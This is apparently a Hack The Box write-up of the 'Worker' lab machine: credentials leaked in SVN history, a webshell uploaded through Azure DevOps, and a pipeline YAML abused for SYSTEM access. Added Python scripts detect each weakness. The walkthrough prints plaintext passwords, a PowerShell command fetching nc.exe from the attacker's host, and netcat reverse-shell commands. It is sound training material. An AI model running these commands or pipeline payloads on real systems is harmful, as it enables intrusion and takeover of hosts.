Worker-htb-writeup

0x00 Skills covered in this box

Skills in this chapter: enumerating the SVN service on port 3690, reviewing SVN commit history, hunting for leaked sensitive information, abusing Azure DevOps functionality, checking for additional drives mounted on the host, and creating a YAML pipeline file through Azure Repos Git to obtain a reverse shell.

Reference: https://0xdf.gitlab.io/2021/01/30/htb-worker.html

0x01 Obtaining user access

1. Target IP address: 10.10.10.203

2. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.203
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 16:27 CST
Nmap scan report for 10.10.10.203
Host is up (0.49s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3690/tcp open  svn
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 15.67 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
80,3690,5985,
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -sV -sC -p80,3690,5985 -Pn --min-rate=10000 10.10.10.203
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 16:28 CST
Nmap scan report for 10.10.10.203
Host is up (0.59s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.89 seconds

3. Three ports are open. Look up how to work with the SVN service on port 3690:

https://book.hacktricks.xyz/v/cn/network-services-pentesting/3690-pentesting-subversion-svn-server

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -vn 10.10.10.203 3690
(UNKNOWN) [10.10.10.203] 3690 (svn) open
( success ( 2 2 ( ) ( edit-pipeline svndiff1 accepts-svndiff2 absent-entries commit-revprops depth log-revprops atomic-revprops partial-replay inherited-props ephemeral-txnprops file-revs-reverse list ) ) )

4. From here it is a matter of working with the SVN service; follow the commands from the reference above.

svn ls svn://10.10.10.203 #list
svn log svn://10.10.10.203 #Commit history
svn checkout svn://10.10.10.203 #Download the repository
svn up -r 2 #Go to revision 2 inside the checkout folder

┌──(kali㉿offsec)-[~/Desktop]
└─$ svn ls svn://10.10.10.203 #list
dimension.worker.htb/
moved.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ svn log svn://10.10.10.203 # Commit history
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 21:52:00 +0800 (六, 2020-06-20) | 1

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 21:50:20 +0800 (六, 2020-06-20) | 1

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 21:46:19 +0800 (六, 2020-06-20) | 1

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 21:45:16 +0800 (六, 2020-06-20) | 1

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 21:43:43 +0800 (六, 2020-06-20) | 1

First version
------------------------------------------------------------------------


┌──(kali㉿offsec)-[~/Desktop]
└─$ svn checkout svn://10.10.10.203 #Download the repository
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
A dimension.worker.htb/assets/css
A dimension.worker.htb/assets/css/fontawesome-all.min.css
A dimension.worker.htb/assets/css/main.css
A dimension.worker.htb/assets/css/noscript.css
A dimension.worker.htb/assets/js
A dimension.worker.htb/assets/js/breakpoints.min.js
A dimension.worker.htb/assets/js/browser.min.js
A dimension.worker.htb/assets/js/jquery.min.js
A dimension.worker.htb/assets/js/main.js
A dimension.worker.htb/assets/js/util.js
A dimension.worker.htb/assets/sass
A dimension.worker.htb/assets/sass/base
A dimension.worker.htb/assets/sass/base/_page.scss
A dimension.worker.htb/assets/sass/base/_reset.scss
A dimension.worker.htb/assets/sass/base/_typography.scss
A dimension.worker.htb/assets/sass/components
A dimension.worker.htb/assets/sass/components/_actions.scss
A dimension.worker.htb/assets/sass/components/_box.scss
A dimension.worker.htb/assets/sass/components/_button.scss
A dimension.worker.htb/assets/sass/components/_form.scss
A dimension.worker.htb/assets/sass/components/_icon.scss
A dimension.worker.htb/assets/sass/components/_icons.scss
A dimension.worker.htb/assets/sass/components/_image.scss
A dimension.worker.htb/assets/sass/components/_list.scss
A dimension.worker.htb/assets/sass/components/_table.scss
A dimension.worker.htb/assets/sass/layout
A dimension.worker.htb/assets/sass/layout/_bg.scss
A dimension.worker.htb/assets/sass/layout/_footer.scss
A dimension.worker.htb/assets/sass/layout/_header.scss
A dimension.worker.htb/assets/sass/layout/_main.scss
A dimension.worker.htb/assets/sass/layout/_wrapper.scss
A dimension.worker.htb/assets/sass/libs
A dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A dimension.worker.htb/assets/sass/libs/_functions.scss
A dimension.worker.htb/assets/sass/libs/_mixins.scss
A dimension.worker.htb/assets/sass/libs/_vars.scss
A dimension.worker.htb/assets/sass/libs/_vendor.scss
A dimension.worker.htb/assets/sass/main.scss
A dimension.worker.htb/assets/sass/noscript.scss
A dimension.worker.htb/assets/webfonts
A dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
A moved.txt
取出版本 5

5. Based on the domain name seen in the source, add an entry to the local hosts file

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.203 dimension.worker.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.203 dimension.worker.htb

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.203 worker.htb" | sudo tee -a /etc/hosts
10.10.10.203 worker.htb

6. Look at the contents of the files pulled from SVN

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)


7. Add the new hostname to the local hosts file as well

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.203 devops.worker.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.203 devops.worker.htb

8. Check what is hosted on the two discovered subdomains

http://dimension.worker.htb

http://devops.worker.htb/

9. Still nothing significant, so continue working on SVN. Following the commit messages in the log, check out the contents of r2 ("Added deployment script").

┌──(kali㉿offsec)-[~/Desktop]
└─$ svn up -r 2
正在升级 '.':
D moved.txt
A deploy.ps1
更新到版本 2

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat deploy.ps1
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

10. This reveals a leaked username and password. Try them against the login at devops.worker.htb

http://devops.worker.htb/ekenas/

nathen
wendel98
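The credential in r2 is still retrievable even though r3 removed deploy.ps1 and HEAD (r5) carries only moved.txt: deleting a file in a later commit does not purge it from history. The script below is an added example, not part of this writeup or of the 0xdf post it references. It walks a constructed snapshot of the repository's revisions (mirroring the files seen above; in real use each revision's files would be populated with `svn cat -r N path`) and reports hard-coded credentials per revision, including the ones a review of HEAD alone would miss. `SAMPLE_HISTORY` and the regex patterns are my own constructions.

```python
"""Scan every revision of a repository snapshot for hard-coded credentials.

Added example, not from the original writeup. The point: a secret scan has to
walk every revision, because a secret removed in a later commit is still in
history (as with deploy.ps1 in r2 above).
"""
import re
from typing import Dict, List, Tuple

# Constructed sample history: revision -> {path: contents}. It mirrors the
# revisions seen in `svn log` above, with a placeholder index.html.
SAMPLE_HISTORY: Dict[int, Dict[str, str]] = {
    1: {"dimension.worker.htb/index.html": "<html>First version</html>"},
    2: {
        "dimension.worker.htb/index.html": "<html>First version</html>",
        "deploy.ps1": (
            '$user = "nathen"\n'
            '$plain = "wendel98"\n'
            '$pwd = ($plain | ConvertTo-SecureString)\n'
            '$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd\n'
        ),
    },
    # r3: deploy.ps1 deleted again, but it stays in history
    3: {"dimension.worker.htb/index.html": "<html>First version</html>"},
    5: {
        "dimension.worker.htb/index.html": "<html>First version</html>",
        "moved.txt": "This repository has been migrated and will no longer be maintained here.",
    },
}

# Patterns for the kinds of secrets seen in this writeup: a PowerShell plaintext
# string destined for ConvertTo-SecureString, and generic password/secret
# assignments. Each pattern captures the literal value.
SECRET_PATTERNS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("powershell-plaintext-credential",
     re.compile(r'\$(?:plain|pass\w*|pwd)\s*=\s*"([^"]+)"', re.IGNORECASE)),
    ("generic-password-assignment",
     re.compile(r'(?:password|passwd|secret|token)\s*[=:]\s*["\']?([^\s"\']+)', re.IGNORECASE)),
]


def scan_text(text: str) -> List[Tuple[str, str]]:
    """Return (pattern_name, matched_value) pairs found in one file's contents."""
    hits = []
    for name, pattern in SECRET_PATTERNS:
        for match in pattern.finditer(text):
            hits.append((name, match.group(1)))
    return hits


def scan_history(history: Dict[int, Dict[str, str]]) -> List[Tuple[int, str, str, str]]:
    """Walk every revision and return findings as (rev, path, pattern_name, value)."""
    findings = []
    for rev in sorted(history):
        for path, contents in history[rev].items():
            for name, value in scan_text(contents):
                findings.append((rev, path, name, value))
    return findings


def secrets_only_in_history(history: Dict[int, Dict[str, str]]) -> List[Tuple[int, str, str]]:
    """Secrets present in some revision but absent from the latest one.

    These are exactly the findings that a HEAD-only review would miss.
    """
    head = max(history)
    head_values = {value for (_, _, _, value) in scan_history({head: history[head]})}
    return sorted({(rev, path, value) for (rev, path, _, value) in scan_history(history)
                   if value not in head_values})


if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print("r%d %s [%s] %s" % finding)
    print("missed by a HEAD-only review:", secrets_only_in_history(SAMPLE_HISTORY))
```

Against the constructed history this reports the r2 deploy.ps1 credential and nothing in r5, which is the situation on the box: the live site looks clean while the history still hands out a working password. The fix on the repository side is to rotate the credential, not just delete the file.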

11. The login succeeds. There is a lot of project source code here; try uploading a file

12. Files cannot be created on the main branch directly, so create a new branch and upload a test.txt file

13. Branches work fine, but creating a branch by itself gets us nowhere.

14. After some exploring, the site turns out to have a pipeline-creation feature

15. Create a branch in this repository and upload a cmdasp.aspx webshell

http://devops.worker.htb/ekenas/SmartHotel360/_git/dimension?path=%2F&version=GBmain&_a=contents

16. Generate the corresponding template

http://devops.worker.htb/ekenas/SmartHotel360/_git/alpha?version=GBmain

17. Add this hostname to the local hosts file and try to reach our webshell URL

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.203 alpha.worker.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.203 alpha.worker.htb

http://alpha.worker.htb/cmdasp.aspx

18. The webshell has been uploaded successfully under this hostname and gives command execution

19. Start a local Python web server, then upload nc.exe with the following command: powershell -c wget 10.10.14.24/nc64.exe -outfile \programdata\nc.exe

powershell -c wget 10.10.14.11/nc.exe -outfile \programdata\nc.exe

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.203 - - [29/Mar/2024 17:47:43] "GET /nc.exe HTTP/1.1" 200 -

dir \programdata\

\programdata\nc.exe -e powershell 10.10.14.11 443

20. With that, we have our first initial shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.203] 50315
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv> whoami
whoami
iis apppool\defaultapppool

21. Next comes host enumeration

PS C:\Users> powershell -c get-psdrive -psprovider filesystem
powershell -c get-psdrive -psprovider filesystem

Name           Used (GB)     Free (GB) Provider      Root           CurrentLocation
----           ---------     --------- --------      ----           ---------------
C                  19,71          9,69 FileSystem    C:\                      Users
W                   2,52         17,48 FileSystem    W:\
PS C:\Users>

PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
PS W:\svnrepos\www\conf>

22. The newly discovered drive holds a pile of credentials; focus on the accounts that also exist on this host

Administrator
restorer
robisl

robisl = wolves11
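Step 22 is a password-reuse check done by eye. The following is an added example, not from the writeup, that makes the same check repeatable: it parses the svnserve passwd format shown above (comment lines, a `[users]` section, one `name = password` per line) and reports SVN accounts that also exist as host users, plus names defined more than once. `SAMPLE_PASSWD` is a constructed subset of the file above and `SAMPLE_HOST_USERS` is a constructed list standing in for the host's local accounts; passwords are parsed but never printed.

```python
"""Audit an svnserve passwd file for account overlap with host users.

Added example, not from the writeup. Shared credentials between a source
control service and OS accounts are what turned a file on W:\ into a WinRM
login here; this script flags that overlap without exposing the passwords.
"""
from typing import Dict, List, Set, Tuple

# Constructed: a subset of W:\svnrepos\www\conf\passwd as shown above,
# plus an extra section to show that only [users] is parsed.
SAMPLE_PASSWD = """\
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
robisl = wolves11
rubkei = the

[other]
ignored = notauser
"""

# Constructed: local account names on the host (cf. C:\Users on the box)
SAMPLE_HOST_USERS = ["Administrator", "restorer", "robisl"]


def parse_svn_passwd(text: str) -> Tuple[Dict[str, str], Set[str]]:
    """Parse svnserve's passwd format.

    Returns (users, duplicates): users maps name -> last password seen inside
    [users]; duplicates is the set of names defined more than once. Lines
    starting with '#' are comments; sections other than [users] are ignored.
    """
    users: Dict[str, str] = {}
    duplicates: Set[str] = set()
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "users" or "=" not in line:
            continue
        name, password = (part.strip() for part in line.split("=", 1))
        if name in users:
            duplicates.add(name)
        users[name] = password
    return users, duplicates


def reuse_candidates(svn_users: Dict[str, str], host_users: List[str]) -> List[str]:
    """SVN usernames that also exist on the host (compared case-insensitively)."""
    host = {u.lower() for u in host_users}
    return sorted(u for u in svn_users if u.lower() in host)


def audit(text: str, host_users: List[str]) -> Dict[str, object]:
    """Summarise the file: account count, duplicate names, and reuse candidates."""
    users, duplicates = parse_svn_passwd(text)
    return {
        "svn_accounts": len(users),
        "duplicates": sorted(duplicates),
        "reuse_candidates": reuse_candidates(users, host_users),
    }


if __name__ == "__main__":
    print(audit(SAMPLE_PASSWD, SAMPLE_HOST_USERS))
```

Any name in `reuse_candidates` should be treated as a credential that may be valid for both services; the remediation is to give the service its own secrets (or move svnserve behind an authentication mechanism that does not store plaintext) rather than to delete the file.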

23. This is the only matching account, so try it. Port 5985 (WinRM) is open on the target, so use evil-winrm

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.203 -u robisl -p 'wolves11'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl

24. That gives us the first flag

*Evil-WinRM* PS C:\Users\robisl\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> dir


Directory: C:\Users\robisl\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/29/2024 9:26 AM 34 user.txt


*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
882d2a77d72658e18aa1b3e5ac8a59bc
*Evil-WinRM* PS C:\Users\robisl\Desktop>

0x02 Obtaining SYSTEM access

25. Further host enumeration turned up nothing useful, so try this account's credentials against devops.worker.htb

26. A new project is visible here

27. Some exploring turns up the following

http://devops.worker.htb/ekenas/PartsUnlimited/_settings/security

PartsUnlimited > Build Administrators

28. This group can define builds using CI and other pipeline-related tasks.

29. From here I did not know how to proceed, so I followed the writeup

Under Pipelines, click the New pipeline button, which starts a series of forms for creating a pipeline. First, choose a repository:

Select Azure Repos Git, then pick PartsUnlimited from the list:

The next step asks for the project type; there are many options:

I chose Starter Pipeline since it looked the simplest.

The next window shows a YAML file that defines the pipeline with various keywords:

trigger:
- master

pool: 'Setup'

steps:
- script: |
    whoami
    type c:\users\administrator\desktop\root.txt
  displayName: 'Pwn all the things'


nt authority\system
06bd4ec57dc9cd8749cb04cd89763e4d

30. Modify the YAML above to get a reverse shell

trigger:
- master

pool: 'Setup'

steps:
- script: c:\programdata\nc.exe -e cmd 10.10.14.11 443
  displayName: 'shellz'

http://devops.worker.htb/ekenas/PartsUnlimited/_build/results?buildId=169

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.203] 49936

PS W:\agents\agent11\_work\8\s> cd C:/
PS C:\> whoami
nt authority\system
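What makes this escalation work is the combination of pipeline-edit rights (Build Administrators) with a self-hosted agent pool (`Setup`) whose agent service runs as SYSTEM: any inline `script` step runs with the agent's privileges, so pipeline-edit rights are effectively administrative rights on the agent host. As an added example, not from the writeup or from any Azure DevOps tooling, the checker below reads the `pool` and `script` fields from the subset of Azure Pipelines YAML used above, without a YAML library, and flags inline scripts bound to a self-hosted pool (a bare `pool: 'Name'` or `pool:` with `name:`, as opposed to a Microsoft-hosted `vmImage:`). Both sample pipelines are constructed: `SELF_HOSTED_SAMPLE` mirrors the shape of the YAML above with benign commands, `HOSTED_SAMPLE` uses a hosted pool for contrast.

```python
"""Flag pipeline YAML that runs inline commands on a self-hosted agent pool.

Added example, not from the writeup. It parses only the subset of Azure
Pipelines YAML used on this page: a top-level `pool`, and `- script:` steps
written inline or as a block scalar.
"""
import re
import textwrap
from typing import Dict, List, Tuple

# Constructed: same shape as the pipeline above, with benign commands
SELF_HOSTED_SAMPLE = """\
trigger:
- master

pool: 'Setup'

steps:
- script: |
    whoami
    hostname
  displayName: 'Inline script on a self-hosted agent'
"""

# Constructed: a Microsoft-hosted pool for contrast
HOSTED_SAMPLE = """\
trigger:
- master

pool:
  vmImage: 'ubuntu-latest'

steps:
- script: echo hello
  displayName: 'Inline script on a hosted agent'
"""


def _indent(line: str) -> int:
    """Number of leading spaces on a line."""
    return len(line) - len(line.lstrip(" "))


def _block_scalar(lines: List[str], start: int, key_indent: int) -> Tuple[List[str], int]:
    """Collect the body of a block scalar (| or >) whose key sits on lines[start].

    Continuation lines are indented deeper than the owning key; blank lines
    inside the block are kept, trailing blanks dropped. Returns (body, next_index).
    """
    body: List[str] = []
    j = start + 1
    while j < len(lines) and (not lines[j].strip() or _indent(lines[j]) > key_indent):
        body.append(lines[j])
        j += 1
    while body and not body[-1].strip():
        body.pop()
    return body, j


def parse_pipeline(text: str) -> Dict[str, object]:
    """Extract the pool definition and every inline `script` step body."""
    lines = text.splitlines()
    pool: Dict[str, str] = {}
    scripts: List[str] = []
    i = 0
    while i < len(lines):
        line = lines[i]
        pool_match = re.match(r"^pool:\s*(.*)$", line)  # top-level key only
        if pool_match:
            value = pool_match.group(1).strip().strip("'\"")
            if value:
                pool["name"] = value
            else:  # mapping form: indented name:/vmImage: keys follow
                j = i + 1
                while j < len(lines) and _indent(lines[j]) > 0:
                    key, _, val = lines[j].strip().partition(":")
                    if key in ("name", "vmImage"):
                        pool[key] = val.strip().strip("'\"")
                    j += 1
        script_match = re.match(r"^-\s*script:\s*(.*)$", line.strip())
        if script_match:
            value = script_match.group(1).strip()
            if value.rstrip("+-") in ("|", ">"):
                body, i = _block_scalar(lines, i, line.index("script:"))
                scripts.append(textwrap.dedent("\n".join(body)))
                continue
            scripts.append(value.strip("'\""))
        i += 1
    return {"pool": pool, "scripts": scripts}


def assess(text: str) -> Dict[str, object]:
    """Inline scripts on a self-hosted pool are high risk: whoever can edit
    the YAML runs commands under the agent's service account."""
    info = parse_pipeline(text)
    pool = info["pool"]
    self_hosted = "name" in pool and "vmImage" not in pool
    return {
        "pool": pool.get("name") or pool.get("vmImage"),
        "self_hosted": self_hosted,
        "inline_scripts": len(info["scripts"]),
        "risk": "high" if self_hosted and info["scripts"] else "low",
    }


if __name__ == "__main__":
    print(assess(SELF_HOSTED_SAMPLE))
    print(assess(HOSTED_SAMPLE))
```

A "high" result is not a bug in the pipeline; it says that pipeline-edit permission on this project equals code execution on the agent host. The defensive levers are the ones this box lacks: run the agent service under a dedicated low-privilege account instead of SYSTEM, restrict who can create or edit pipelines on repositories bound to that pool, and require an approval check on the pool so a fresh pipeline cannot run unattended.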

31. Grab the final flag

PS C:\> cd Users/Administrator/Desktop
PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2024-03-29 14:55 34 root.txt


PS C:\Users\Administrator\Desktop> cat root.txt
06bd4ec57dc9cd8749cb04cd89763e4d
PS C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/270


https://sh1yan.top/2024/03/30/Worker-htb-writeup/
Author: shiyan
Published: 30 March 2024